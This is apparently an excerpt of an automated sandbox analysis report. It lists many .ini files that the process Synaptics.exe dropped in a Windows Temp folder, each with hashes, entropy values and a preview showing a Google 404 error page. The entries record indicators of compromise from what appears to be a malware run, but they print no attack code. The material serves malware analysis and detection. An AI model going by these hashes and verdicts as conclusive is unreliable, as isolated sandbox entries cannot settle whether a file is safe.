                                                                                                                                                                          SHA-256:8855A065C03C08EAA4D9F561C467296FBF0F4AE20B2C432713E953318A4ECBBE
                                                                                                                                                                          SHA-512:4749DD23B2C42726AE3460D3106AD233C2B76E7A05925F3EFA511C2649A898A7BC4D0C8D9B15CACC278757F1B20A89E72A90CAB95AD2C1D569A3AA14679042F5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Iz5fegswW2zvrIZ9ORYmGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Ev5lST8.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.268440962305017
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                                                                          MD5:C47B1CAD4A36D1C17BFECA1E533E849C
                                                                                                                                                                          SHA1:21FB75F7E38C490A243C8C1D6B2BDA2E716E9429
                                                                                                                                                                          SHA-256:96F6422FED8E6B63330831677C793619C4AE1873B08EE7810BD72FE0D4AE0429
                                                                                                                                                                          SHA-512:16CC3585761C6E5301928DEEA0643FB1B6D79522DE8232F3E7B06A4A861B6D61EC4F41E0EAF81FFDB9C5FE641F1EB60D2F9653FD80AC9C50B0B1DF7803749F1F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VDGFuvdDMv61RzqP2nWrRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\FGDFjnm.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259408113907637
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0QoISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6I+pAZewRDK4mW
                                                                                                                                                                          MD5:D8E06F02CE00271E30732C538BFD1468
                                                                                                                                                                          SHA1:A4F7372C126817287D390FBEC2B1E0D59C83F94B
                                                                                                                                                                          SHA-256:EF45A4D86741261B21F121B9EC2EDBFE2DDEC22C2A14F4A4366DDE09D844478C
                                                                                                                                                                          SHA-512:473B59EE681D18868C2ACDE47547D218798A1487FF64F6EA8CF1C927A3AD4F278D7E7860872A54A43EA536FC96B0EB48798509A6E98FB1E9B0568F273DE449BA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wPmahF-m03rlP4N1q9M6XQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\FtR9Wu5.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.250784972728303
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0eTSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                                                                          MD5:766E47DC235AD9561D576E4EF2ABAACC
                                                                                                                                                                          SHA1:7B8DE4BDF44C0B29F880612FA9E828AE0AC56397
                                                                                                                                                                          SHA-256:15DA4789ADD98595B5E4E0AC027C50F85AD43B97A8E0881E00DE626056157E1C
                                                                                                                                                                          SHA-512:69C49128680A213488E147FAB5643939C87184B3FEC7E246B92FA35DC736D9B343C17755F14A02785995EDCBFADAE84CE37551DC368047C863FD24BF6861E1D6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ix7hP-X6sumoquD_2bN6lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\I3dNF8Y.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.25722993402053
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0NoSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                                          MD5:62EFD9CB4E2EEBDA61842F5ABD7251D2
                                                                                                                                                                          SHA1:EE38574826BC47C6A88497D43CB2C073CE93CD1A
                                                                                                                                                                          SHA-256:68DC4F73156E6AF00567843C0DD8FEA16C79FC304A8902A8A565D375A1910277
                                                                                                                                                                          SHA-512:46F1ED442FD77D8C3E3604F151A0855137C645EED1F6F6B0784C5DD991E2D4534DE9F75B58976CF79AA8234E169DCD4A3E65C6928D433B5505501B0026F38A8B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4p9AZpzKg_mdaurXZfnDzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\JeN1NGA.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260572161235495
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0UWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9W+pAZewRDK4mW
                                                                                                                                                                          MD5:753EC86E403AC578200C7BB5C245FB4C
                                                                                                                                                                          SHA1:63A0414A85C9581F544B85A3B15C45FF9CA7BDDE
                                                                                                                                                                          SHA-256:F6E0D02A4163DB99A90A613451966614133F3D12AE5EDB91C5FAB3E3141FA603
                                                                                                                                                                          SHA-512:4BCFED4CAD556E30D6C33BE6B5380DED1E6AB57CEDD603C02DB973C5F607A4F4151866808BF86BBD286940432A8D6D05819222AED6D88A747B92A73EE117BD52
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fWqxO9t1IqBrjolDoh2h8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\L5ZPx34.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259781721756828
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                                                                                          MD5:B18BDC4EDAADAF28CD4FF61B2CA178C5
                                                                                                                                                                          SHA1:F6DC2AE79170E8918FBE57ABA9BEF5F7290A8666
                                                                                                                                                                          SHA-256:99658C7F62FAAD76F1CB2473ADC67B02E3C991FBF7B68D674D949ACAC0CFF10E
                                                                                                                                                                          SHA-512:603854041529EF88020BE8BF498214ED761DAD3B1CB6FA8F6AD48583BE8D0993BE130C412DD797221169528981F7C648C61F83C6BA85E7EBB2DD70FA69A6AEFA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VTMuFyCIyxdOrgwh8HsObw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\LV6aZVs.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.253161863484117
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+08EzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9Ez+pAZewRDK4mW
                                                                                                                                                                          MD5:8958331BEF15AE84881DD2F66289214B
                                                                                                                                                                          SHA1:AAC1D3EE1D377D052F9A45553AAB8F577EDA8D7C
                                                                                                                                                                          SHA-256:BFEEA34219D0D43BA68CDC52262CD67D8E3A28402474CF5C7C090D9C545B3FA2
                                                                                                                                                                          SHA-512:DB55A2BE17BDB6D74B4877E576D1AF26296F6DBF6E8B90F57AF9DA249FB0F44FFFF05E321EA90E5CC1E4E42D02381A792F724074146812B264204995908EE988
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZkTnaHvaR3wSaInqlHR0pw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Nw6xx6z.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.248670856440285
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0CQHwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                                                          MD5:06AE8FBD0053226A8ABE7DCC76767C24
                                                                                                                                                                          SHA1:26078F737B7ADBC207680A247CEFBB53F0651767
                                                                                                                                                                          SHA-256:027E22E9B88E7ABFFF406E1316E59A1A1C0187ECB1F2BDDF92FFCCBCCE12CE12
                                                                                                                                                                          SHA-512:A41E903B0EDCB72D7911D33FAB73D9F83A1281B10DB52F80C0B40C64175BEF3F8BCE1D5DB42D4046C8B562CECC8047ACAEB9B25558D3627CDB5174E69B30FD4F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Pypd9bsLygdmTk6UTk8ubg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\OoVehL8.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2609606134338645
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0jZiSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kc+pAZewRDK4mW
                                                                                                                                                                          MD5:F4960186B2632AB76274F3A3FB49217D
                                                                                                                                                                          SHA1:215E42C1C2A825B4366D692F500F325FDBBB56D6
                                                                                                                                                                          SHA-256:9A7DABE4AE7529D99C0C5EEAFD749825DE27FC0F679ACF1703BDB4F275B961BA
                                                                                                                                                                          SHA-512:2737117EA6D6F8D5A68FD0912DB4F9208414DC74FD0ADEEC23BAB71664BD46A5361C365EA982155EC2302BA5839A1DC11B3E53C0D39FDE5F104093E4F71E7CBC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0KacuQt1SdjhTGWoRPy7Xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RQ18YFU.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259828769541439
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                                                          MD5:10481253502E6DC237CBEC6FF407EA44
                                                                                                                                                                          SHA1:5010044BA75B3E2788A284E2F328E3AA9C0EB0CE
                                                                                                                                                                          SHA-256:ECB0F9C7CF630CCE896773D2F0B2C1640CF02696BDFA35922CC8D5A3A529627F
                                                                                                                                                                          SHA-512:E840B55B06EFDC0368EE9BFDAFB9C5DB909FEE299F144AD80481D12B2691D2D71309A5A695DE9D3753DAC9E0DBE252F378AE7F88A58668F618F233E1E4A23D11
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U4k6d79NafvG_13NTMtZfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Rp9NV56.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2714398480599325
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                                          MD5:5402DC5FC07EFBF0F8D3019F8B676C10
                                                                                                                                                                          SHA1:C8F561D324DBF43ED924335FDB9E3F66C316A17E
                                                                                                                                                                          SHA-256:02360D156135AFF7B3D2D174CF1492F2296DD1F2F70217F01E691A9758A54BA6
                                                                                                                                                                          SHA-512:072F8791C5797250B46EC1BBA57C9AAFA4ECC4A47DA0EFB791679EE46F69940684FB40EAF18373709B482884EA1085477989D88B5AAA003F351E2A3E7FC99488
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="C5VVpRqSaHIE-ZrQhjxQmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\SKpagpt.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260107376344088
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0qUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                                                          MD5:048E54CE76837EB6DCDB8EF5CD3EDBAA
                                                                                                                                                                          SHA1:3858B2FF0832CFBAC477A6715E3532B3FB8DFC22
                                                                                                                                                                          SHA-256:BD35C1B6BBA859D191E6E0C2E057D07A1E90ECC51264098F42FAB25A6ECC4D97
                                                                                                                                                                          SHA-512:6B8164FEC826D2E5243FB5D76A7ABCF6F4485C0D1053EF7FB924DDC743D642E5AA511AD6B2DCD17C223114F107E66BEE0D6C822489B9EA242DBAC2F671445AF1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mwQB0lCntNmEtds9ICWhZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\TE9GZZy.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260045694064983
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                                                                                                          MD5:B94D1F552330C73B42834F147B684605
                                                                                                                                                                          SHA1:45685B582486C4BD7D8FA9E8ED9DED8A1541B165
                                                                                                                                                                          SHA-256:F277BB62536503A948E72AD62935C03EE25743C6558ED80F0FF6AD4F9B19FFC7
                                                                                                                                                                          SHA-512:59B7FFEB78F36A7F728E4F1CA02038409A567D8BF4550F30180C75E7CABDEFF4D01B94B1385845881160CF80206920C0F998D1F28137CE7A7F4219F09A90CD9B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QpgvkVf3zFb0LNyynhX8mA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\TlenQVb.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.266509646383657
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0mgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7g+pAZewRDK4mW
                                                                                                                                                                          MD5:F25222048E8510F14639605A88D92C1D
                                                                                                                                                                          SHA1:BF3FE9D8788035FA948DA5B928F1D97D73D6E8E0
